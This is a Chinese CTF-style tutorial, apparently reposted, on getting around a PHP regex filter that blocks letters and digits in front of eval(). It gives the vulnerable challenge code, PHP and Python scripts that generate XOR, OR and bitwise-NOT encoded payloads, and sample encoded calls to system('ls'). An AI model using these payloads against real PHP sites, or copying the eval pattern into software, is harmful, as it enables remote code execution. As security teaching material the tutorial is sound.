目次
1、题目代码
1.异或
php部分:
python代码:
2.或
php代码
python代码
测试结果:
3、取反
php脚本:
测试结果:
1、题目代码
- <?php
- error_reporting(0);
- highlight_file(__FILE__);
- $code=$_GET['code'];
- if(preg_match('/[a-z0-9]/i',$code)){
- die('hacker');
- }
- eval($code);
1.异或
php部分:
- <?php
- $myfile = fopen("xor_rce.txt", "w");
- $contents="";
- for ($i=0; $i < 256; $i++) {
- for ($j=0; $j <256 ; $j++) {
- if($i<16){
- $hex_i='0'.dechex($i);
- }
- else{
- $hex_i=dechex($i);
- }
- if($j<16){
- $hex_j='0'.dechex($j);
- }
- else{
- $hex_j=dechex($j);
- }
- $preg = '/[a-z0-9]/i'; //根据题目给的正则表达式修改即可
- if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){
- echo "";
- }
-
- else{
- $a='%'.$hex_i;
- $b='%'.$hex_j;
- $c=(urldecode($a)^urldecode($b));
- if (ord($c)>=32&ord($c)<=126) {
- $contents=$contents.$c." ".$a." ".$b."\n";
- }
- }
- }
- }
- fwrite($myfile,$contents);
- fclose($myfile);
python代码:
- import requests
- import urllib
- from sys import *
- import os
- def action(arg):
- s1=""
- s2=""
- for i in arg:
- f=open("xor_rce.txt","r")
- while True:
- t=f.readline()
- if t=="":
- break
- if t[0]==i:
- #print(i)
- s1+=t[2:5]
- s2+=t[6:9]
- break
- f.close()
- output="(""+s1+""^""+s2+"")"
- return(output)
-
- while True:
- param=action(input("\n[+] your function:") )+action(input("[+] your command:"))+";"
- print(param)
[+] your function:system
[+] your command:ls
("%08%02%08%08%05%0d"^"%7b%7b%7b%7c%60%60")("%0c%08"^"%60%7b");
将得到的结果复制已往即可,终极效果如下图所示:
2.或
原理是相同的,只必要把上面的脚本上稍加改动即可
php代码
- <?php
- $myfile = fopen("or_rce.txt", "w");
- $contents="";
- for ($i=0; $i < 256; $i++) {
- for ($j=0; $j <256 ; $j++) {
- if($i<16){
- $hex_i='0'.dechex($i);
- }
- else{
- $hex_i=dechex($i);
- }
- if($j<16){
- $hex_j='0'.dechex($j);
- }
- else{
- $hex_j=dechex($j);
- }
- $preg = '/[0-9a-z]/i';//根据题目给的正则表达式修改即可
- if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){
- echo "";
- }
-
- else{
- $a='%'.$hex_i;
- $b='%'.$hex_j;
- $c=(urldecode($a)|urldecode($b));
- if (ord($c)>=32&ord($c)<=126) {
- $contents=$contents.$c." ".$a." ".$b."\n";
- }
- }
- }
- }
- fwrite($myfile,$contents);
- fclose($myfile);
python代码
- import requests
- import urllib
- from sys import *
- import os
- def action(arg):
- s1=""
- s2=""
- for i in arg:
- f=open("or_rce.txt","r")
- while True:
- t=f.readline()
- if t=="":
- break
- if t[0]==i:
- #print(i)
- s1+=t[2:5]
- s2+=t[6:9]
- break
- f.close()
- output="(""+s1+""|""+s2+"")"
- return(output)
-
- while True:
- param=action(input("\n[+] your function:") )+action(input("[+] your command:"))+";"
- print(param)
[+] your function:system
[+] your command:ls
("%13%19%13%14%05%0d"|"%60%60%60%60%60%60")("%0c%13"|"%60%60");
测试结果:
3、取反
因为取反的话,根本上用的都是一个不可见字符,全部不会触发到正则表达式,我们一个php脚本就可以了
php脚本:
- <?php
- //在命令行中运行
- fwrite(STDOUT,'[+]your function: ');
- $system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
- fwrite(STDOUT,'[+]your command: ');
- $command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
- echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
[+]your function: system
[+]your command: ls
(~%8C%86%8C%8B%9A%92)(~%93%8C);
测试结果:
欧克,竣事!!
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
